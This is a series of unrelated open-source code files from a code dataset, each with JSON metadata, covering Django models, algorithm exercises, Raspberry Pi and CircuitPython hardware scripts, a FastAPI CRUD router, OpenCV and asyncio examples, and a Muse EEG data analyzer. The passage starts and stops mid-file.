import gettext_lazy as _\nimport re\n\n\nclass ColorField(models.CharField):\n default_validators = []\n\n def __init__(self, *args, **kwargs):\n colorRE = re.compile(\"#([A-Fa-f0-9]{8})$\")\n self.default_validators.append(\n RegexValidator(\n colorRE, _(\"Enter a valid hexA color, eg. #00000000\"), \"invalid\"\n )\n )\n\n kwargs.setdefault(\"max_length\", 9)\n super().__init__(*args, **kwargs)\n","repo_name":"Sluggo-Issue-Tracker/Sluggo-API","sub_path":"api/models/fields/color_field.py","file_name":"color_field.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"41"} +{"seq_id":"71696082365","text":"from django.test import TestCase\nfrom abclist.models import ABCList\n\nclass ABCListTestCase(TestCase):\n def setUp(self):\n ABCList.objects.create(user='twe', abclist={'a':\"Alpha\", 'b': \"Beta\"})\n ABCList.objects.create(user='twe', abclist={'c': \"Ceta\", 'd': \"Delta\"})\n\n def test_abclist_encoding(self):\n \"\"\"The abclist is encoded correcty as JSON dump\"\"\"\n abcs = ABCList.objects.all()[:1].get()\n\n expected_dict = {'a': 'Alpha', 'b': 'Beta'}\n self.assertEqual(abcs.abclist, expected_dict)\n\n","repo_name":"h4p/abc-list-backend","sub_path":"abclist/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"30695970252","text":"from django.template import Library\n\nregister = Library()\n\n\n@register.simple_tag\ndef get_object_properties(object, properties):\n \"\"\"Return first non empty property of given object.\"\"\"\n properties = properties.split(\",\")\n for property in properties:\n attribute = getattr(object, property, \"\")\n if attribute:\n return getattr(object.translated, property)\n return \"\"\n","repo_name":"mirumee/legacy-views","sub_path":"saleor/core/templatetags/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"41"} +{"seq_id":"26781882969","text":"from collections import deque\n\nopen_card = []\nanswer = float('inf')\ndir = [(-1, 0), (1, 0), (0, -1), (0, 1)]\nN = 4\n\ndef find(board, r, c, cnt):\n global open_card, answer\n print(board, cnt, open_card)\n\n\n state = True\n for i in range(N):\n for j in range(N):\n if board[i][j] != 0:\n state = False\n break\n\n if state:\n answer = min(answer, cnt)\n return\n\n for dx, dy in dir:\n for i in range(1, N+1):\n if 0 <= r + dx*i < N and 0 <= c + dy*i < N and board[r+dx*i][c+dy*i] != 0:\n if not open_card: # opencard가 없을 경우\n open_card.append((board[r+dx*i][c+dy*i], r+dx*i, c+dy*i))\n find(board, r+dx*i, c+dy*i, cnt+2)\n open_card.pop()\n break\n else: # opencard가 있을경우\n if not(open_card[0][1] == r+dx*i and open_card[0][2] == c+dy*i): # opencard 랑 다른 위치의 카드일 경우\n if open_card[0][0] != board[r+dx*i][c+dy*i]: # 현재 위치의 카드랑 다를 경우\n find(board, r+dx*i, c+dy*i, cnt+1)\n break\n else: # 현재 위치의 카드랑 opencard가 같을경우\n tmp = board[r+dx*i][c+dy*i]\n open_card_num, open_x, open_y = open_card.pop()\n board[r+dx*i][c+dy*i] = 0\n board[open_x][open_y] = 0\n find(board, r+dx*i, c+dy*i, cnt+2)\n board[r+dx*i][c+dy*i] = tmp\n board[open_x][open_y] = tmp\n open_card.append((open_card_num, open_x, open_y))\n break\n\ndef solution(board, r, c):\n find(board, r, c, 0)\n \n return answer\n\nboard = [[1,0,0,3],[2,0,0,0],[0,0,0,2],[3,0,1,0]]\nr, c = 1, 0\nboard = 
[[3,0,0,2],[0,0,1,0],[0,1,0,0],[2,0,0,3]]\nr, c = 0, 1\nprint(solution(board, r, c))\n\n\n","repo_name":"SeoHyungjun/Coding_Test","sub_path":"programmers/2021카카오블라인드채용/카드짝맞추기/카드짝맞추기.py","file_name":"카드짝맞추기.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"11505453760","text":"import RPi.GPIO as GPIO\nimport spidev\nimport time\nimport os\nimport sys\nfrom datetime import datetime\n\nspi = spidev.SpiDev()\nspi.open(0,0)\n\n# global variables\ncount = 1\nfrequ = 0.5\nstop_pressed = True\nplay = True\nclear_reset = False\n\ndef GetData(channel):\n spi.max_speed_hz = 1350000\n adc = spi.xfer2([1,(8+channel)<<4,0])\n data = ((adc[1]&3)<<8)+adc[2]\n return data\n\ndef ConvertVolts(data,places):\n volts = (data*3.3)/float(1023)\n volts = round(volts,places)\n return volts\n\ndef PotVolts(data,places):\n v = ConvertVolts(data,places)\n return v\n\ndef ConvertTemp(data,places):\n volt = ConvertVolts(data,places)\n Temp = (volt-0.5)/0.01\n Temp = round(Temp,places)\n return Temp\n\ndef LightPercent(data,places):\n V = ConvertVolts(data,places)\n Percent = (V/3)*100\n return Percent\n","repo_name":"Hungwe/eee3096s_prac4","sub_path":"Prac_4_code.py","file_name":"Prac_4_code.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"12255918113","text":"from IOfilesHandler import inputHandler, outputHandler\nfrom invertedIndex import postingsHandler\nfrom TFIDF import scoreCounter, termCounter\nfrom queryHandler import queryOR, queryAND\nfrom permutationIndex import RotationsCreator, permutationIndexCreator\n\n\ndef process_query(postings_dict, main_file_name='sample.txt', query_file_name='query.txt', result_file_name='result.txt'):\n all_queries_list = inputHandler.split_query(query_file_name)\n [docs_for_TFIDF_dict, term_counts_in_docs_dict] = TFIDF_preparation(main_file_name)\n for query in all_queries_list:\n selected_postings_dict = postingsHandler.get_all_postings_by_query(postings_dict, query)\n intercept_with_skips_list = queryAND.query_and(selected_postings_dict)\n join_postings_list = queryOR.query_or(selected_postings_dict)\n ranked_intercept_postings_list = scoreCounter.create_ranked_posting_list(docs_for_TFIDF_dict, term_counts_in_docs_dict, selected_postings_dict, intercept_with_skips_list)\n ranked_joining_postings_list = scoreCounter.create_ranked_posting_list(docs_for_TFIDF_dict, term_counts_in_docs_dict, selected_postings_dict, join_postings_list)\n outputHandler.write_selected_postings(selected_postings_dict, result_file_name)\n outputHandler.write_query(query, intercept_with_skips_list, result_file_name, 'QueryAnd') # write and query\n outputHandler.write_query(query, ranked_intercept_postings_list, result_file_name, 'TF-IDF') # write TF-IDF ranked list\n outputHandler.write_query(query, join_postings_list, result_file_name, 'QueryOr') # write or query\n outputHandler.write_query(query, ranked_joining_postings_list, result_file_name, 'TF-IDF') # write TF-IDF ranked list\n\n\ndef TFIDF_preparation(main_file_name):\n # docs_for_TFIDF_dict = { docid : ['word1', 'word2', 'word3', ... 
] }\n docs_for_TFIDF_dict = inputHandler.create_docs_terms_dict(main_file_name)\n # Example: {'1000': Counter({'Thi': 1, 'Jane': 1, 'Austen': 1}), '1001': Counter({'is': 2, 'This': 1, 's': 1}), ...}\n term_counts_in_docs_dict = termCounter.each_term_count_in_doc(docs_for_TFIDF_dict)\n return docs_for_TFIDF_dict, term_counts_in_docs_dict\n\n\ndef process_substitute_query(postings_dict, template_file_name='template.txt', result_file_name='result.txt'):\n all_template_list = inputHandler.split_query(template_file_name)\n rotations_dict = RotationsCreator.create_rotations(postings_dict.keys())\n for template_list in all_template_list:\n for template in template_list:\n result_postings = permutationIndexCreator.get_postings_by_template(postings_dict, rotations_dict, template)\n outputHandler.write_wild_card(template, result_postings, result_file_name)\n","repo_name":"Markvarte/data-processing-and-search","sub_path":"queryHandler/queryProcessor.py","file_name":"queryProcessor.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"12132487462","text":"string1 = 'abccba'\n\ndef polindrome(text):\n\td = {}\n\tfor i in range(len(text)):\n\t\tif text[i] not in d:\n\t\t\td[text[i]] = 1\n\t\telse:\n\t\t\td[text[i]] += 1\n\tprint(d)\n\tif len(d) == 0:\n\t\treturn True\n\treturn False\n\nprint(polindrome(string1))\n\n##############\nfrom collections import Counter\n\ndef anagramCheck(text1, text2):\n\td1 = {}\n\tfor i in text1:\n\t\tif i not in d1 and i != ' ':\n\t\t\td1[i] = 1\n\t\telif i != ' ':\n\t\t\td1[i] += 1\n\td2 = {}\n\tfor i in text2:\n\t\tif i not in d2 and i != ' ':\n\t\t\td2[i] = 1\n\t\telif i != ' ':\n\t\t\td2[i] += 1\n\treturn d1 == d2\n\nprint(anagramCheck(string1, string2))","repo_name":"1JigSaW/books","sub_path":"CrackingTheCodingInterview/1.5.py","file_name":"1.5.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"6642552366","text":"import time\nimport board\nimport audioio\nimport digitalio\nimport math\nimport array\nimport touchio\n\n\n# enable speaker\nspeakerswitch = digitalio.DigitalInOut(board.SPEAKER_ENABLE)\nspeakerswitch.direction = digitalio.Direction.OUTPUT\nspeakerswitch.value = True\n\n\n# define speaker\nspeaker = audioio.AudioOut(board.SPEAKER)\n\n# define playing function\ndef playtone(num):\n # generate one period of sine wav (C,D,E,F,G,A,B)\n frequency = array.array(\"i\",[261,293,329,349,392,440,493])\n length = 8000 // frequency[num-1]\n sine_wave = array.array(\"h\", [0] * length)\n\n for i in range(length):\n sine_wave[i] = int(math.sin(math.pi * 2 * i / 18) * (2 ** 15))\n sound = audioio.RawSample(sine_wave)\n # play the sound\n if speaker.playing == False:\n speaker.play(sound, loop = True)\n\n# define stop playing function\ndef audiostop():\n if speaker.playing:\n speaker.stop()\n\n# define touch pad 1 - 7\ntouch1 = touchio.TouchIn(board.A1)\ntouch2 = touchio.TouchIn(board.A2)\ntouch3 = touchio.TouchIn(board.A3)\ntouch4 = touchio.TouchIn(board.A4)\ntouch5 = touchio.TouchIn(board.A5)\ntouch6 = touchio.TouchIn(board.A6)\ntouch7 = touchio.TouchIn(board.A7)\n\n\n# loop forever\nwhile True:\n\n #if the pin is touched\n if touch1.value:\n print(\"A1\")\n playtone(1)\n if touch2.value:\n print(\"A2\")\n playtone(2)\n if touch3.value:\n print(\"A3\")\n playtone(3)\n if touch4.value:\n print(\"A4\")\n playtone(4)\n if touch5.value:\n print(\"A5\")\n playtone(5)\n if 
touch6.value:\n print(\"A6\")\n playtone(6)\n if touch7.value:\n print(\"A7\")\n playtone(7)\n\n # stop playing if nothing is touched \n if touch1.value == False and touch2.value == False and touch3.value == False and touch4.value == False and touch5.value == False and touch6.value == False and touch7.value == False:\n audiostop()\n\ntime.sleep(0.01)\n","repo_name":"pvanallen/circuit-python-cpx-examples","sub_path":"pythonbasics/capacitive_touch.py","file_name":"capacitive_touch.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"32258330316","text":"\"\"\"\nCreated on Thu Aug 14 11:33:18 2014\n\n@author: Maurizio Napolitano \n\"\"\"\nfrom dbxmlmibact import DBMibac,LuoghiCultura, Indirizzi, Extra, Allegati, Links, TipologiaLuoghi\nfrom managexmlmibac import MibacData\nimport os\n\ndata = MibacData()\nmibac = data.getalldata()\n#mibac = data.getmibacdata(1,\"musei\",0,1000)\ndb = DBMibac(os.getcwd(),\"luoghicultura\")\n\nluoghi = []\ntipi = MibacData.tipologialuoghi\nfor t in tipi.viewkeys():\n id = int(t)\n nome = tipi[id]\n tiposql = TipologiaLuoghi(idtipo=id,nome=nome)\n db.add(tiposql)\n \nfor m in mibac:\n #Accessibilita(accessibilita=m.accessibilita)\n\n #links\n #codice_dbunico2, url,ruolo, titolo,descrizione,descrizione\n if len(m.links)>0:\n for link in m.links:\n if (len(link)>0):\n for l in link:\n url = \"\"\n titolo = \"\"\n descrizione = \"\"\n tipo = \"\"\n if l.has_key('url'):\n url = l['url']\n if l.has_key('titolo'):\n titolo = l['titolo']\n if l.has_key('descrizione'):\n descrizione = l['descrizione']\n if l.has_key('tipo'):\n tipo = l['tipo']\n linkssql = Links(codice_dbunico2=m.codice_dbunico2,url=url,titolo=titolo,descrizione=descrizione,tipo=descrizione)\n db.add(linkssql)\n \n #Allegati\n #codice_dbunico2, copyright, url, ruolo, didascalia,mibacallegato,descrizione\n if len(m.allegati)>0:\n for allegato in m.allegati:\n if (len(allegato)>0):\n allegatisql = Allegati(codice_dbunico2=m.codice_dbunico2,copyright=allegato['copyright'], url=allegato['url'], ruolo=allegato['ruolo'], \n didascalia=allegato['didascalia'],mibacidallegato=allegato['mibacidallegato'],descrizione=allegato['descrizione'])\n db.add(allegatisql)\n \n #Extra: tipologia,categoria,traduzioni varie, contenitori\n \n if (len(m.contenitori)>0):\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"contenitori\",attributo='denominazione',valore=m.contenitori['denominazione'])\n db.add(extrasql)\n \n if len(m.categorie) > 0:\n for c in range(len(m.categorie)):\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"categoria\",attributo=c,valore=m.categorie[c])\n db.add(extrasql)\n \n if len(m.tipologie) > 0:\n for t in range(len(m.tipologie)):\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"tipologia\",attributo=t,valore=m.tipologie[t])\n db.add(extrasql)\n\n if len(m.sinonimi) > 0:\n for s in range(len(m.sinonimi)):\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"sinomimo\",attributo=s,valore=m.sinonimi[s])\n db.add(extrasql)\n \n if len(m.traduzioni_descrizione) > 0:\n for t in m.traduzioni_descrizione:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_descrizione\",attributo=t,valore=m.traduzioni_descrizione[t])\n db.add(extrasql)\n\n if len(m.traduzioni_chiusurasettimanale) > 0:\n for t in m.traduzioni_chiusurasettimanale:\n extrasql = 
Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_chiusurasettimanale\",attributo=t,valore=m.traduzioni_chiusurasettimanale[t])\n db.add(extrasql)\n\n if len(m.traduzioni_costo_biglietto) > 0:\n for t in m.traduzioni_costo_biglietto:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_costo_biglietto\",attributo=t,valore=m.traduzioni_costo_biglietto[t])\n db.add(extrasql) \n\n if len(m.traduzioni_fax_biglietteria) > 0:\n for t in m.traduzioni_fax_biglietteria:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_costo_biglietto\",attributo=t,valore=m.traduzioni_fax_biglietteria[t])\n db.add(extrasql) \n \n if len(m.traduzioni_orario) > 0:\n for t in m.traduzioni_orario:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_orario\",attributo=t,valore=m.traduzioni_orario[t])\n db.add(extrasql) \n \n if len(m.traduzioni_orario_biglietteria) > 0:\n for t in m.traduzioni_orario_biglietteria:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_orario_biglietteria\",attributo=t,valore=m.traduzioni_orario_biglietteria[t])\n db.add(extrasql) \n \n\n if len(m.traduzioni_prenotazioni_telefono) > 0:\n for t in m.traduzioni_prenotazioni_telefono:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_prenotazioni_telefono\",attributo=t,valore=m.traduzioni_prenotazioni_telefono[t])\n db.add(extrasql) \n\n if len(m.traduzioni_telefono) > 0:\n for t in m.traduzioni_telefono:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_telefono\",attributo=t,valore=m.traduzioni_telefono[t])\n db.add(extrasql) \n \n if len(m.traduzioni_telefono_biglietteria) > 0:\n for t in m.traduzioni_telefono_biglietteria:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_telefono_biglietteria\",attributo=t,valore=m.traduzioni_telefono_biglietteria[t])\n db.add(extrasql) \n\n if len(m.traduzioni_riduzioni_biglietto) > 0:\n for t in m.traduzioni_riduzioni_biglietto:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_riduzioni_biglietto\",attributo=t,valore=m.traduzioni_riduzioni_biglietto[t])\n db.add(extrasql) \n\n \n if len(m.indirizzi) > 0: \n for ind in m.indirizzi:\n point='POINT(%s %s)' % (ind['longitudine'],ind['latitudine'])\n indirizzosql = Indirizzi(codice_dbunico2=m.codice_dbunico2, indirizzo=ind['indirizzo'], \n cap=ind['cap'], comune=ind['comune'], localita=ind['localita'], provincia=ind['provincia'], \n regione=ind['regione'], latitudine=ind['latitudine'], longitudine=ind['longitudine'], \n istat_comune=ind['istat_comune'], istat_provincia=ind['istat_provincia'], \n istat_regione=ind['istat_regione'], geom=point)\n db.add(indirizzosql) \n \n point='POINT(%s %s)' % (m.longitudine,m.latitudine)\n luoghiculturasql = LuoghiCultura(cap=m.cap,categoria=m.categoria,chiusurasettimanale=m.chiusurasettimanale,\n codice_dbunico2=m.codice_dbunico2, codice_entecompetente_dbunico20=m.codice_entecompetente_dbunico20,\n codice_entecompetente_mibac=m.codice_entecompetente_mibac,codice_entegestore_dbunico20=m.codice_entegestore_dbunico20,\n codice_entegestore_mibac=m.codice_entegestore_mibac,comune=m.comune,costo_biglietto=m.costo_biglietto,\n data_validazione=m.data_validazione,data_ultima_modifica=m.data_ultima_modifica,\n data_creazione_xml=m.data_creazione_xml,descrizione=m.descrizione, email=m.email, email_biglietteria=m.email_biglietteria,\n email_certificata=m.email_certificata, entecompetente=m.entecompetente,entecompilatore=m.entecompilatore,entegestore=m.entegestore,\n 
fax=m.fax,fax_biglietteria=m.fax_biglietteria,idtipologialuogo=m.idtipologialuogo, img=m.img,indirizzo=m.indirizzo,istat_regione=m.istat_regione,\n istat_provincia=m.istat_provincia,istat_comune=m.istat_comune,latitudine=m.latitudine,localita=m.localita, longitudine=m.longitudine,\n nome_redattore=m.nome_redattore,nome_capo_redattore=m.nome_capo_redattore, nome=m.nome, orario=m.orario, \n orario_biglietteria=m.orario_biglietteria, prenotazioni_sitoweb=m.prenotazioni_sitoweb,prenotazioni_email=m.prenotazioni_email, \n prenotazioni_telefono=m.prenotazioni_telefono, proprieta=m.proprieta, provincia=m.provincia,responsabile=m.responsabile, \n regione=m.regione, riduzioni_biglietto=m.riduzioni_biglietto, ruolo_entecompetente=m.ruolo_entecompetente, \n ruolo_entegestore=m.ruolo_entegestore, stato=m.stato, sitoweb=m.sitoweb, sorgente=m.sorgente, telefono=m.telefono,\n telefono_biglietteria=m.telefono_biglietteria, tipologia=m.tipologia,tipologialuogo=m.tipologialuogo, tipo_prenotazioni=m.tipo_prenotazioni,\n geom=point) \n db.add(luoghiculturasql) \ndb.session.commit()\n \n","repo_name":"napo/musei2csv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"3253009974","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 31 21:36:14 2019\n\n@author: haimingwd\n\"\"\"\n\ndef merge(intervals):\n if not intervals:\n return []\n intervals.sort(key = lambda ea:ea[0])\n res = [intervals[0]]\n for ea in intervals:\n last = res[-1]\n if ea[0] > last[1]:\n res.append(ea)\n elif ea[1] > last[1]:\n last[1] = ea[1]\n return res\n\nmerge([[1,3],[2,6],[8,10],[15,18]])","repo_name":"hightrol/LeetCode","sub_path":"MergeIntervals 56.py","file_name":"MergeIntervals 56.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"31430921195","text":"# define get, insert, update & delete methods\r\nfrom fastapi import APIRouter\r\nfrom model.request import ListingRequest, ListingUpdateRequest\r\nfrom model.response import response\r\nfrom model.listing import Listing\r\nfrom db.database import Database\r\nfrom sqlalchemy import and_, desc\r\n\r\n# APIRouter creates path operations for product module\r\nrouter = APIRouter(\r\n prefix=\"/listings\",\r\n tags=[\"Listing\"],\r\n responses={404: {\"description\": \"Not found\"}},\r\n)\r\n\r\ndatabase = Database()\r\nengine = database.get_db_connection()\r\n\r\n\r\n@router.post(\"/add\", response_description=\"Listing data added into the database\")\r\nasync def add_listing(listing_req: ListingRequest):\r\n # prepare listing object\r\n new_listing = Listing()\r\n new_listing.address = listing_req.address\r\n new_listing.price = listing_req.price\r\n session = database.get_db_session(engine)\r\n session.add(new_listing)\r\n session.flush()\r\n # get id of the inserted product\r\n session.refresh(new_listing, attribute_names=['listing_id'])\r\n data = {\"listing_id\": new_listing.listing_id}\r\n session.commit()\r\n session.close()\r\n return response(data, 200, \"Listing added successfully.\", False)\r\n\r\n\r\n@router.put(\"/update\")\r\nasync def update_listing(listing_update_req: ListingUpdateRequest):\r\n listing_id = listing_update_req.listing_id\r\n session = database.get_db_session(engine)\r\n try:\r\n is_listing_updated = session.query(Listing).filter(Listing.listing_id == listing_id).update({\r\n Listing.address: 
listing_update_req.address, Listing.price: listing_update_req.price\r\n }, synchronize_session=False)\r\n session.flush()\r\n session.commit()\r\n response_msg = \"Listing updated successfully\"\r\n response_code = 200\r\n error = False\r\n if is_listing_updated == 1:\r\n # After successful update, retrieve updated data from db\r\n data = session.query(Listing).filter(\r\n Listing.listing_id == listing_id).one()\r\n elif is_listing_updated == 0:\r\n response_msg = \"Listing not updated. No Listing found with this id :\" + \\\r\n str(listing_id)\r\n error = True\r\n data = None\r\n return response(data, response_code, response_msg, error)\r\n except Exception as ex:\r\n print(\"Error : \", ex)\r\n\r\n\r\n@router.delete(\"/{listing_id}/delete\")\r\nasync def delete_listing(listing_id: int):\r\n session = database.get_db_session(engine)\r\n try:\r\n is_deleted = session.query(Listing).filter(Listing.listing_id == listing_id).delete()\r\n session.flush()\r\n session.commit()\r\n response_msg = \"Listing deleted successfully\"\r\n response_code = 200\r\n error = False\r\n data = {\"listing_id\": listing_id}\r\n if is_deleted == 0:\r\n response_msg = \"Listing not deleted. No Listing found with this id :\" + \\\r\n str(listing_id)\r\n error = True\r\n data = None\r\n return response(data, response_code, response_msg, error)\r\n except Exception as ex:\r\n print(\"Error : \", ex)\r\n\r\n\r\n@router.get(\"/{listing_id}\")\r\nasync def read_product(listing_id: int):\r\n session = database.get_db_session(engine)\r\n response_message = \"Listing retrieved successfully\"\r\n data = None\r\n try:\r\n data = session.query(Listing).filter(Listing.listing_id == listing_id).one()\r\n except Exception as ex:\r\n print(\"Error\", ex)\r\n response_message = \"Listing Not found\"\r\n error = False\r\n return response(data, 200, response_message, error)\r\n\r\n\r\n@router.get(\"/\")\r\nasync def read_all_listings(page_size: int, page: int):\r\n session = database.get_db_session(engine)\r\n data = session.query(Listing).order_by(\r\n desc(Listing.listing_id)).limit(page_size).offset((page-1)*page_size).all()\r\n return response(data, 200, \"Products retrieved successfully.\", False)\r\n\r\n","repo_name":"mainframeali/CrudDemo","sub_path":"endpoint/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"35414518083","text":"#This program reads in a text file and returns the a new file with the same \r\n# content but with line numbers\r\nfile = input(\"Enter in a file you want to open and remake:\")\r\nrfile = open(file,\"r\")\r\nwfile = open(\"New File.txt\",\"w\")\r\ncount = 0\r\nfor line in rfile:\r\n count = count + 1\r\n linee = str(count) + \" \" + line\r\n wfile.write(str(linee))\r\nrfile.close()\r\nwfile.close()\r\n","repo_name":"zackbell123/ZackBell-DataStructures-HomeWork","sub_path":"File Line Numbers.py","file_name":"File Line Numbers.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"32091025858","text":"import cv2\nimport numpy as np\n# 导入图片\nimg = cv2.imread('hello.jpeg')\n\n#灰度化\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n# cv2.imshow('gray',gray)\n#二值化\nret,threshold = cv2.threshold(gray,100,255,cv2.THRESH_BINARY)\n# cv2.imshow('threshold',threshold)\n#查找轮廓\nimge, controus, tree = cv2.findContours(threshold,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n#最小外接矩形\nr = 
cv2.minAreaRect(controus[1])\nbox = cv2.boxPoints(r) #拿到了起始点宽高\nbox = np.int0(box) #box是浮点型的,需要强转\ncv2.drawContours(img, [box],0,(0,0,255),2) #因为box是个数组所以[box]\n\n#最大外接矩形\nx,y,w,h = cv2.boundingRect(controus[1])\nprint(x,y,w,h )\ncv2.rectangle(img, (x,y),(x+w,y+h),(255,0,0),3)\n\n\ncv2.imshow('img',img)\nwhile True:\n key = cv2.waitKey(1)\n if key & 0xff == ord('q'):\n break\n\ncv2.destroyAllWindows()","repo_name":"octopuslearn/python","sub_path":"opencv_new_231114/start_231114/第十章/外接矩形.py","file_name":"外接矩形.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"30842257737","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n#import cv2\r\n\r\ndef dummy(img2):\r\n\tf = 3\r\n\tm,n = img2.shape\r\n\timg3 = np.zeros((m, n))\r\n\tI = img2\r\n\tfor i in range(0, m):\r\n\t\tfor j in range(0, n):\r\n\t\t\tt = np.floor(i/f)\r\n\t\t\tr = np.floor(j/f)\r\n\t\t\tt1 = round(t)\r\n\t\t\tr1 = round(r)\r\n\t\t\tA = [[1,0,0,0],[1,1,0,0],[1, 0, 1,0],[1,1,1,1]]\r\n\t\t\tY = [I[t1,r1], I[t1+1, r1], I[t1,r1+1], I[t1+1,r1+1]]\r\n\t\t\tres = np.linalg.inv(A).dot(Y)\r\n\t\t\timg3[i, j] = round(res[0] + res[1]*(t - t1) + res[2]*(r -r1) +res[3]*(r-r1)*(t -t1))\r\n\treturn img3\r\n#img = cv2.imread('images\\Flowers.png')\r\n#img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n#img3 = dummy(img)\r\n#plt.imshow(img3, cmap='gray')\r\n#plt.show()","repo_name":"Ajeet-kumar1/Digital-image-processing-M.tech-IISc","sub_path":"Assignment 2/dumm.py","file_name":"dumm.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"24667171746","text":"import asyncio\n\n\nasync def sub_printer():\n print('Hi from the sub-printer')\n\n\nasync def printer():\n print('Before creating the sub-printer task')\n asyncio.create_task(sub_printer())\n print('After creating the sub-printer task')\n\n\nasync def main():\n asyncio.create_task(printer())\n await shutdown()\n\n\nasync def shutdown(timeout=5):\n tasks = []\n # Collect all tasks from `asyncio`\n for task in asyncio.all_tasks():\n # Make sure we skip our current task so we don't loop\n if task is not asyncio.current_task():\n tasks.append(task)\n\n for future in asyncio.as_completed(tasks, timeout=timeout):\n await future\n\nasyncio.run(main())\n","repo_name":"mastering-python/code_2","sub_path":"CH_13_async_io/T_18_wait_for_all_tasks.py","file_name":"T_18_wait_for_all_tasks.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"41"} +{"seq_id":"24406260575","text":"import csv\r\nimport math\r\nimport pygame\r\nimport sys\r\n# takes a wave absolute row and gives accumulates the values and counts\r\n\r\n\r\ndef addabsolute(row):\r\n count = 0\r\n res = 0\r\n for i in range(2, 6):\r\n if row[i] != \"nan\" or row[i] != \"0\":\r\n count += 1\r\n res += float(row[i])\r\n return res, count;\r\n\r\n# Resets the dictionary for next segment\r\n\r\n\r\ndef resetWavesDict():\r\n return {\" /muse/elements/alpha_absolute\": (0, 0),\r\n \" /muse/elements/beta_absolute\": (0, 0),\r\n \" /muse/elements/gamma_absolute\": (0, 0),\r\n \" /muse/elements/experimental/concentration\": (0, 0)}\r\n\r\n# calculates the wave data and puts it into a list\r\n\r\n\r\ndef calculatewaves(wavesDict):\r\n listres = []\r\n for key in wavesDict.keys():\r\n listres.append(float(wavesDict[key][0]) / (float(wavesDict[key][1]) + 
1.0))\r\n return listres\r\n\r\n\r\ndef rateWaves(lower, upper, compare):\r\n waveNames = [\"alpha\", \"beta\", \"gamma\", \"concentration\"]\r\n waveRatings = [None] * 4\r\n flipped = False\r\n for i in range(0, 4):\r\n if lower[i] > upper[i]:\r\n flipped = True\r\n temp = lower[i]\r\n lower[i] = upper[i]\r\n upper[i] = temp\r\n waveRatings[i] = 0.0\r\n if compare[i] <= lower[i]:\r\n print(waveNames[i] + \": very relaxing\")\r\n if flipped is False:\r\n waveRatings[i] = 0.0\r\n if flipped is True:\r\n waveRatings[i] = 10.0\r\n elif compare[i] >= upper[i]:\r\n print(waveNames[i] + \": not relaxing\")\r\n if flipped is False:\r\n waveRatings[i] = 10.0\r\n if flipped is True:\r\n waveRatings[i] = 0.0\r\n else:\r\n print(i)\r\n print(upper[i])\r\n if flipped is False:\r\n waveRatings[i] = ((float(compare[i]) - float(lower[i])) * 10.0) / (float(upper[i]) - float(lower[i]))\r\n if flipped is True:\r\n waveRatings[i] = 10 - ((float(compare[i]) - float(lower[i])) * 10.0) / (float(upper[i]) - float(lower[i]))\r\n\r\n return waveRatings\r\n\r\n\r\nif __name__ == '__main__':\r\n f = open(\"C:/Users/binph/Downloads/recording_8.csv\", 'rt');\r\n reader = csv.reader(f)\r\n firstrow = next(reader)\r\n count = 0\r\n wavesDict = {\" /muse/elements/alpha_absolute\": (0, 0),\r\n \" /muse/elements/beta_absolute\": (0, 0),\r\n \" /muse/elements/gamma_absolute\": (0, 0),\r\n \" 